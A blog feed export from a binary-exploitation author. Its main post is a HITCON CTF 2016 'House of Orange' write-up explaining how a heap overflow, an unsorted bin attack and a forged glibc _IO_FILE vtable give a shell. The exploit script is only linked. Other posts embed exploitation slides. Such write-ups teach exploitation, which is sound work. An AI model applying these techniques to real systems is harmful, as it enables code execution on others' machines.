tag:blogger.com,1999:blog-81370607046438395422024-03-13T09:46:18.420-07:00Pwning My LifeAngelboyAngelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-8137060704643839542.post-15032502407587504142017-11-05T18:00:00.000-08:002017-11-05T18:00:06.115-08:00Play with FILE Structure - Yet Another Binary Exploit Technique<iframe src="//www.slideshare.net/slideshow/embed_code/key/3HUSKsmnVX6aYQ" width="595" height="485" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <div style="margin-bottom:5px"> <strong> <a href="//www.slideshare.net/AngelBoy1/play-with-file-structure-yet-another-binary-exploit-technique" title="Play with FILE Structure - Yet Another Binary Exploit Technique" target="_blank">Play with FILE Structure - Yet Another Binary Exploit Technique</a> </strong> from <strong><a href="https://www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></strong> </div>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-51769103189422102352016-10-12T07:09:00.001-07:002016-10-12T07:50:40.686-07:00HITCON CTF Qual 2016 - House of Orange Write up<style type="text/css">
a {
color: #4183C4; }
a.absent {
color: #cc0000; }
a.anchor {
display: block;
padding-left: 30px;
margin-left: -30px;
cursor: pointer;
position: absolute;
top: 0;
left: 0;
bottom: 0; }
h1, h2, h3, h4, h5, h6 {
margin: 20px 0 10px;
padding: 0;
font-weight: bold;
-webkit-font-smoothing: antialiased;
cursor: text;
position: relative; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
text-decoration: none; }
h1 tt, h1 code {
font-size: inherit; }
h2 tt, h2 code {
font-size: inherit; }
h3 tt, h3 code {
font-size: inherit; }
h4 tt, h4 code {
font-size: inherit; }
h5 tt, h5 code {
font-size: inherit; }
h6 tt, h6 code {
font-size: inherit; }
h1 {
font-size: 28px;
color: black; }
h2 {
font-size: 24px;
border-bottom: 1px solid #cccccc;
color: black; }
h3 {
font-size: 18px; }
h4 {
font-size: 16px; }
h5 {
font-size: 14px; }
h6 {
color: #777777;
font-size: 14px; }
p, blockquote, ul, ol, dl, li, table, pre {
margin: 15px 0; }
hr {
background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
border: 0 none;
color: #cccccc;
height: 4px;
padding: 0;
}
body > h2:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child + h2 {
margin-top: 0;
padding-top: 0; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
margin-top: 0;
padding-top: 0; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
margin-top: 0;
padding-top: 0; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
margin-top: 0; }
li p.first {
display: inline-block; }
li {
margin: 0; }
ul, ol {
padding-left: 30px; }
ul :first-child, ol :first-child {
margin-top: 0; }
dl {
padding: 0; }
dl dt {
font-size: 14px;
font-weight: bold;
font-style: italic;
padding: 0;
margin: 15px 0 5px; }
dl dt:first-child {
padding: 0; }
dl dt > :first-child {
margin-top: 0; }
dl dt > :last-child {
margin-bottom: 0; }
dl dd {
margin: 0 0 15px;
padding: 0 15px; }
dl dd > :first-child {
margin-top: 0; }
dl dd > :last-child {
margin-bottom: 0; }
blockquote {
border-left: 4px solid #dddddd;
padding: 0 15px;
color: #777777; }
blockquote > :first-child {
margin-top: 0; }
blockquote > :last-child {
margin-bottom: 0; }
table {
padding: 0;border-collapse: collapse; }
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0; }
table tr:nth-child(2n) {
background-color: #f8f8f8; }
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr td {
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr th :first-child, table tr td :first-child {
margin-top: 0; }
table tr th :last-child, table tr td :last-child {
margin-bottom: 0; }
img {
max-width: 100%; }
span.frame {
display: block;
overflow: hidden; }
span.frame > span {
border: 1px solid #dddddd;
display: block;
float: left;
overflow: hidden;
margin: 13px 0 0;
padding: 7px;
width: auto; }
span.frame span img {
display: block;
float: left; }
span.frame span span {
clear: both;
color: #333333;
display: block;
padding: 5px 0 0; }
span.align-center {
display: block;
overflow: hidden;
clear: both; }
span.align-center > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: center; }
span.align-center span img {
margin: 0 auto;
text-align: center; }
span.align-right {
display: block;
overflow: hidden;
clear: both; }
span.align-right > span {
display: block;
overflow: hidden;
margin: 13px 0 0;
text-align: right; }
span.align-right span img {
margin: 0;
text-align: right; }
span.float-left {
display: block;
margin-right: 13px;
overflow: hidden;
float: left; }
span.float-left span {
margin: 13px 0 0; }
span.float-right {
display: block;
margin-left: 13px;
overflow: hidden;
float: right; }
span.float-right > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: right; }
code, tt {
margin: 0 2px;
padding: 0 5px;
white-space: nowrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
pre code {
margin: 0;
padding: 0;
white-space: pre;
border: none;
background: transparent; }
.highlight pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre code, pre tt {
background-color: transparent;
border: none; }
sup {
font-size: 0.83em;
vertical-align: super;
line-height: 0;
}
* {
-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
body {
width: 854px;
margin:0 auto;
}
}
@media print {
table, pre {
page-break-inside: avoid;
}
pre {
word-wrap: break-word;
}
}
</style>
</head>
<body>
<h1 id="toc_0">HITCON CTF Qual 2016 - House of Orange Write up</h1>
<h3 id="toc_1">Program</h3>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgBqNsB2yePLaBgMpfABHL6awprJu0Y0Ic27yN_h0EGuzp8TjX005ftHMEKZzIL9hzxwxcV8j05NNmjWKtToT1Oa2HiPuLcdmN4I403K3xzBON_lcEzvgC3DCZBOh-WqsfULsxWu467Kw/s1600/program.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgBqNsB2yePLaBgMpfABHL6awprJu0Y0Ic27yN_h0EGuzp8TjX005ftHMEKZzIL9hzxwxcV8j05NNmjWKtToT1Oa2HiPuLcdmN4I403K3xzBON_lcEzvgC3DCZBOh-WqsfULsxWu467Kw/s320/program.png" width="320" height="149" /></a></div>
<ul>
<li><p>Build the house </p>
<ul>
<li>Create a house which contains an orange with the chosen color and price.</li>
<li>It would allocate two object, <em>orange and house</em>, and than allocate a <em>name</em> buffer.</li>
</ul>
<pre><code class="language-c">struct orange{
int price ;
int color ;
};
struct house {
struct orange *org;
char *name ;
};
</code></pre>
<ul>
<li>You can only build the house four times.</li>
</ul></li>
<li><p>See the house</p>
<ul>
<li>Show the information of the house </li>
</ul></li>
<li><p>Upgrade the house</p>
<ul>
<li>Upgrade the information of the house</li>
<li>You can modify the name of house and the information of orange</li>
<li>You can only upgrade three times.</li>
</ul></li>
<li><p>Give up</p>
<ul>
<li>Exit</li>
</ul></li>
</ul>
<h3 id="toc_2">Vulnerability</h3>
<ul>
<li><p>Heap overflow</p>
<ul>
<li>When you upgrade the name of house, it does not check the size of name, leading to heap overflow.</li>
</ul>
<pre><code>printf("Length of name :");
size = read_int();
if(size > 0x1000){
size = 0x1000;
}
printf("Name:");
read_input(cur_house->name,size);
printf("Price of Orange: ");
cur_house->org->price = read_int();
</code></pre></li>
<li><p>Information leak</p>
<ul>
<li>It use <code>read()</code> to read input without NULL byte which leads to information leak.</li>
</ul>
<pre><code>void read_input(char *buf,unsigned int size){
int ret ;
ret = read(0,buf,size);
if(ret <= 0){
puts("read error");
_exit(1);
}
}
</code></pre></li>
</ul>
<h3 id="toc_3">Exploitation</h3>
<ul>
<li>Idea
<ul>
<li>[Fail] Use heap overflow to overwrite the size of top with a larger number. And then use <em>house of force</em> to overwrite the name pointer. The program uses unsigned int and size is less than 0x1000 , so this idea is impossible.</li>
<li>[Fail] Use heap overflow to overwrite the name pointer , but the program only uses malloc. This idea is impossible.</li>
<li>[Success] We need to create a free chunk on the heap by using <code>_int_free</code> in sysmalloc, then use the unsorted bin attack to overwrite the <code>_IO_list_all</code> in libc to control the program counter.</li>
</ul></li>
<li><p>Overwrite the size of top chunk</p>
<ul>
<li>We want to use the <code>_int_free</code> in the sysmalloc , so we have to overwrite the top chunk size to trigger the sysmalloc at first.</li>
<li><code>Trigger sysmalloc</code> : If the top chunk size is not large enough, it would use <a href="http://osxr.org:8080/glibc/source/malloc/malloc.c#2247">sysmalloc</a> to allocate a new memory area.<a href="http://osxr.org:8080/glibc/source/malloc/malloc.c#3746">(source)</a> It would increase the size of the old heap or mmap a new memory area. We have to malloc a size smaller than the <code>mmp_.mmap_threshold</code> to extend the old heap.</li>
<li><p><code>Trigger _int_free in sysmalloc</code> : In order to trigger the <code>_int_free</code> in sysmalloc.<a href="http://osxr.org:8080/glibc/source/malloc/malloc.c#2689">(source)</a>, we have to make the top chunk size larger than MINSIZE(0x10). The problem is that there is two assertion in the sysmalloc(), so we have to forge the legal size of top chunk to bypass it. To bypass the assertion, there are some requirements of the size must be met: </p>
<ul>
<li>larger than MINSIZE(0x10) </li>
<li>smaller than <code>need size + MINSIZE</code></li>
<li>prev inuse is set</li>
<li><code>old_top + oldsize</code> must be aligned a page.</li>
</ul>
<pre><code>assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
</code></pre>
<p>For example, if the top address is <code>0x6030d0</code> and the size is <code>0x20f31</code>, we should overwrite the size with <code>0xf31</code> to bypass the assertion and then allocate a large chunk to trigger the <code>sysmalloc</code> and <code>_int_free</code>. Finally, we could get an unsorted bin chunk on the heap.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg24BM1v-Fe4KuthPWNIpsUCyKo6fil7FVgVcQR01VGuJ0tHlCF2oRb5ze5zl1CYCJ7pWAcQUIrIwR3Ymsaw45LzQAcapyyaZXoCEAD8rupbTmuanNClyP-ZRFxrPVkaLoPL9zPLYSr7hY/s1600/heapinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg24BM1v-Fe4KuthPWNIpsUCyKo6fil7FVgVcQR01VGuJ0tHlCF2oRb5ze5zl1CYCJ7pWAcQUIrIwR3Ymsaw45LzQAcapyyaZXoCEAD8rupbTmuanNClyP-ZRFxrPVkaLoPL9zPLYSr7hY/s320/heapinfo.png" width="320" height="120" /></a></div>
</ul></li>
<li><p>Information Leak</p>
<ul>
<li>After creating an unsorted bin chunk, We can use it to leak the address of libc and heap.</li>
<li><code>Leak the address of libc</code>: We can build a new house with a size of large chunk but smaller than the top chunk size that we’ve modified, to get the unsorted bin chunk. We can input eight bytes characters as the name of house, then use the <code>See the house</code> to get the address of libc. Since malloc would not clean the value on the heap, so we can get the address in libc.</li>
<li><code>Leak the address of heap</code>: Since there is no any chunk with the matching size in the unsorted bin, it would be placed in the large bin at first. There are two member, <code>fd_nextsize</code> and <code>bk_nextsize</code>, in the large chunk, that pointer to next and prev large chunk. We can use it to leak the address of heap by upgrading the house.</li>
</ul></li>
<li><p>Hijack the control flow in the malloc abort routine</p>
<ul>
<li><code>Abort routine</code>: When the glibc detects some memory corruption problem, it would enter the abort routine. <a href="http://osxr.org:8080/glibc/source/stdlib/abort.c#0050">(source)</a> It would flush all streams in the stage one. In other words, it would enter the <code>_IO_flush_all_lockp</code> <a href="http://osxr.org:8080/glibc/source/libio/genops.c#0821">(source)</a> function and use the <code>_IO_FILE</code> object, which is called <code>_IO_list_all</code> in it. If we overwrite the pointer and forge the object, then we could control the flow. Because the <code>_IO_FILE</code> uses virtual function table called <code>_IO_jump_t</code><a href="http://osxr.org:8080/glibc/source/libio/libioP.h#0290">(source)</a> to do something, we can forge it. You can reference <a href="https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/">this article</a></li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrY0Yv1CJbRpRGvGGfRQlcyDxPPAA8FCRDcxGXyi9qnBj1-S9xwib1FmAGLTN3_85Bfb6u9QRwWrO00DHKyfnX9JWEIxGnAfdkyPLf5qWyWvUcBkwVREKEbsj7JNw-kt_c-C_WCuMJaxQ/s1600/abort_routine.001.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrY0Yv1CJbRpRGvGGfRQlcyDxPPAA8FCRDcxGXyi9qnBj1-S9xwib1FmAGLTN3_85Bfb6u9QRwWrO00DHKyfnX9JWEIxGnAfdkyPLf5qWyWvUcBkwVREKEbsj7JNw-kt_c-C_WCuMJaxQ/s400/abort_routine.001.jpeg" width="400" height="300" /></a></div>
<ul>
<li><p><code>Forge the _IO_FILE object</code>: Our goal is to trigger <code>_IO_flush_all_lockp</code> to call <code>_IO_OVERFLOW</code>, so we need to satisfy some condition in the <code>_IO_FILE object</code><a href="http://osxr.org:8080/glibc/source/libio/libio.h#0245">source</a>.</p>
<pre><code class="language-c">0841 if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
0842 #if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
0843 || (_IO_vtable_offset (fp) == 0
0844 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
0845 > fp->_wide_data->_IO_write_base))
0846 #endif
0847 )
0848 && _IO_OVERFLOW (fp, EOF) == EOF)
</code></pre>
<p>Using gdb to trace it is easier. In the end of the object, it has a virtual function table. We can forge it on the heap.</p></li>
<li><p><code>Unsorted bin Attack</code>: When we allocate a chunk, it would process the unsorted bin first. It would remove the chunk in unsorted bin whether or not the size matches. However, it does not check the completeness of the linked list. Before the unsorted chunk is removed from the unsorted bin, we can overwrite the bk pointer with any address-0x10. And then the address will be overwritten with the address of unsorted bin. <a href="http://osxr.org:8080/glibc/source/malloc/malloc.c#3485">(source)</a> We decide to use it to overwrite <code>_IO_list_all</code> with the address of unsorted bin</p>
<pre><code class="language-c"> /* remove from unsorted list */
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
</code></pre></li>
<li><p><code>Control the world</code>: When we use the unsorted bin attack to overwrite <code>_IO_list_all</code> with the address of unsorted bin, it would not control the flow first. Since we can't control the content in the <code>main_arena</code>, we decide to use the chain pointer which points to next <code>_IO_FILE</code> object. It would be a small bin chunk in the <code>main_arena</code>. We can use the upgrade function to overwrite the size of unsorted chunk to control it, and forge the <code>_IO_FILE</code> object at the same time. After then, we use the build function to trigger unsorted bin attack to overwrite the <code>_IO_list_all</code>. Finally, it would trigger unsorted bin chunk allocation and detect some memory corruption in malloc because the size of chunk is smaller than MINSIZE. We have hijacked the <code>_IO_list_all</code> so that we can control the world. By the way, if you can control the chain pointer in the <code>_IO_list_all</code>, you can continue to do anything. We call it <code>File Stream Oriented Programming</code>.</p></li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKm76qygk1vBDfbwpvhfvc4qNx9zLl3zvac24uyH9_J4anji6HZaXgf3h3uJ2L_C4ufJSiQ_xd6eKDHs7J5dApIRCRkV-aRnmOSsQUXfPwnErIaeLfduhULzpk951ZWvJ4aD-QF2ciCn4/s1600/listall.001.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKm76qygk1vBDfbwpvhfvc4qNx9zLl3zvac24uyH9_J4anji6HZaXgf3h3uJ2L_C4ufJSiQ_xd6eKDHs7J5dApIRCRkV-aRnmOSsQUXfPwnErIaeLfduhULzpk951ZWvJ4aD-QF2ciCn4/s400/listall.001.jpeg" width="400" height="300" /></a></div>
<ul>
<li><code>Exploit script</code>:<a href="https://github.com/scwuaptx/CTF/blob/master/2016-writeup/hitcon/houseoforange.py">houseoforange.py</a></li>
<li><p><code>Screenshot</code></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEsZ1IkrL_MHSqrsOEhD4a4dD4dHHsHuRD1z84GCYNa4UkV-xxqwqQR3k8vwzNIqnHvVIs_LpPB-72vHMJpQhdBqnqfBzVDUsEo0s25gH7VwSrTzmVKsPrwaT2tr7uYTwUkSrVpZvaack/s1600/screen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEsZ1IkrL_MHSqrsOEhD4a4dD4dHHsHuRD1z84GCYNa4UkV-xxqwqQR3k8vwzNIqnHvVIs_LpPB-72vHMJpQhdBqnqfBzVDUsEo0s25gH7VwSrTzmVKsPrwaT2tr7uYTwUkSrVpZvaack/s400/screen.png" width="400" height="382" /></a></div>
<li><p><code>flag</code>:</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlLuU4nzHQQ8dE2O9vdjG5NqIbrbRNOIaa13SHmLam81jysYKweZQcJloo5CcAIqf3Py-LhA3HP8Bwc0-3uNUs1zyJrJuemkxSwSCOtiREIUzeXO4orGMuon9_svdSVwLB3PoxZlpWWk/s1600/flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlLuU4nzHQQ8dE2O9vdjG5NqIbrbRNOIaa13SHmLam81jysYKweZQcJloo5CcAIqf3Py-LhA3HP8Bwc0-3uNUs1zyJrJuemkxSwSCOtiREIUzeXO4orGMuon9_svdSVwLB3PoxZlpWWk/s400/flag.png" width="400" height="203" /></a></div>
</ul>
<p>I get the abort message as well as a shell. That is so fun isn't it ?
Thank you for joining the HITCON CTF 2016 Qual. I hope everyone can learn more from our CTF.</p></li>
</ul>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com19tag:blogger.com,1999:blog-8137060704643839542.post-59037507134925353082016-03-01T21:31:00.000-08:002016-10-10T21:32:08.018-07:00Advanced heap exploitation
其實這份做好一段時間了,不過之前一直沒有放到 blog 這邊來XD</br>
這邊主要延續之前那份 Heap explotation ,介紹一些稍微進階一點的玩法</br>
<iframe src="//www.slideshare.net/slideshow/embed_code/key/43h3huv0dCuXHM" width="595" height="485" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <div style="margin-bottom:5px"> <strong> <a href="//www.slideshare.net/AngelBoy1/advanced-heap-exploitaion" title="Advanced heap exploitaion" target="_blank">Advanced heap exploitaion</a> </strong> from <strong><a target="_blank" href="//www.slideshare.net/AngelBoy1">Angel Boy</a></strong> </div>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-2625481645281068102016-02-18T21:30:00.000-08:002016-10-10T21:30:26.463-07:00Pwning in c++Pwning in c++</br>
<iframe src="//www.slideshare.net/slideshow/embed_code/key/26vRLXZCuw6HcN" width="595" height="485" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <div style="margin-bottom:5px"> <strong> <a href="//www.slideshare.net/AngelBoy1/pwning-in-c-basic" title="Pwning in c++ (basic)" target="_blank">Pwning in c++ (basic)</a> </strong> from <strong><a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></strong> </div>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-50095274052507440542015-08-21T21:28:00.000-07:002016-10-10T21:29:09.557-07:00Heap exploitationbamboofox 暑期訓練課程,主要介紹 glibc 中 malloc 怎麼去運作,以及相關的 exploit 技巧</br>
<iframe src="//www.slideshare.net/slideshow/embed_code/key/u4kt9okARVjNj7" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <div style="margin-bottom:5px"> <strong> <a href="//www.slideshare.net/AngelBoy1/heap-exploitation-51891400" title="Heap exploitation" target="_blank">Heap exploitation</a> </strong> from <strong><a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></strong> </div>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-23627407848482802582015-07-06T21:27:00.000-07:002016-10-10T21:28:22.125-07:00Execution of ELFBamboofox 暑期訓練課程,主要介紹 Linux 底下的執行檔是怎麼被運行的,以及 Lazy binding 機制</br>
<iframe src="//www.slideshare.net/slideshow/embed_code/key/HKUE6KxRfL9hpm" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <div style="margin-bottom:5px"> <strong> <a href="//www.slideshare.net/AngelBoy1/execution-50215114" title="Execution" target="_blank">Execution</a> </strong> from <strong><a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></strong> </div>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com2tag:blogger.com,1999:blog-8137060704643839542.post-18896097832594821682015-07-02T21:26:00.000-07:002016-10-10T21:27:01.813-07:00SROP非常有趣的 ROP 技巧,不需要找多一點的 gadget 就可以完成想做的事情,不過最大的缺點在於可以塞的空間要夠大才行</br>
<iframe src="//www.slideshare.net/slideshow/embed_code/key/2cUC8oC7Q1P5RP" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <div style="margin-bottom:5px"> <strong> <a href="//www.slideshare.net/AngelBoy1/sigreturn-ori" title="Sigreturn Oriented Programming" target="_blank">Sigreturn Oriented Programming</a> </strong> from <strong><a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></strong> </div>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com2tag:blogger.com,1999:blog-8137060704643839542.post-76223461154107406582015-07-02T21:25:00.000-07:002016-10-10T21:25:20.463-07:00Return to dl-resolve 前陣子在玩的一個小技巧,某些時候特別好用,附上前陣子在 Bamboofox 分享的投影片
<iframe src="//www.slideshare.net/slideshow/embed_code/key/aT5KVsJL4gmd7M" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <div style="margin-bottom:5px"> <strong> <a href="//www.slideshare.net/AngelBoy1/re2dlresolve" title="Return to dlresolve" target="_blank">Return to dlresolve</a> </strong> from <strong><a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></strong> </div>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-88183233919441080712015-04-28T21:22:00.000-07:002016-10-10T21:23:35.615-07:00Plaid CTF 2015 Write-up <style type="text/css">
a {
color: #4183C4; }
a.absent {
color: #cc0000; }
a.anchor {
display: block;
padding-left: 30px;
margin-left: -30px;
cursor: pointer;
position: absolute;
top: 0;
left: 0;
bottom: 0; }
h1, h2, h3, h4, h5, h6 {
margin: 20px 0 10px;
padding: 0;
font-weight: bold;
-webkit-font-smoothing: antialiased;
cursor: text;
position: relative; }
